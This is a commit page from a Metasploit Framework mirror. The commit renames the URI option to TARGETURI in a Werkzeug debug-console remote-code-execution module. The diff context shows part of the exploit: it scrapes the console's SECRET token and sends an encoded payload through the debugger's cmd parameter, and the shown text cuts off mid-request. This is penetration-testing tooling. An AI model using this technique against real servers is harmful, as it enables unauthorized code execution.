infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

changed URI to TARGETURI as per comments

bug/bundler_fix
h00die 2015-07-13 20:18:45 -04:00
parent 8819674522
commit 57f62ffa76
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/multi/http/werkzeug_debug_rce.rb
View File

@ -36,7 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote
)
register_options(
[
OptString.new('URI',[true,'URI to the console','/console'])
OptString.new('TARGETURI',[true,'URI to the console','/console'])
], self.class
)
end
@ -44,7 +44,7 @@ class Metasploit4 < Msf::Exploit::Remote
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['URI'])
'uri' => normalize_uri(datastore['TARGETURI'])
})
#https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
if res and res.body =~ /Werkzeug powered traceback interpreter/
@ -57,14 +57,14 @@ class Metasploit4 < Msf::Exploit::Remote
#first we need to get the SECRET code
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['URI'])
'uri' => normalize_uri(datastore['TARGETURI'])
})
if res and res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
secret = res.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
vprint_status("Secret Code: #{secret}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['URI']),
'uri' => normalize_uri(datastore['TARGETURI']),
'vars_get' => {
'__debugger__' => 'yes',
'cmd' => payload.encoded,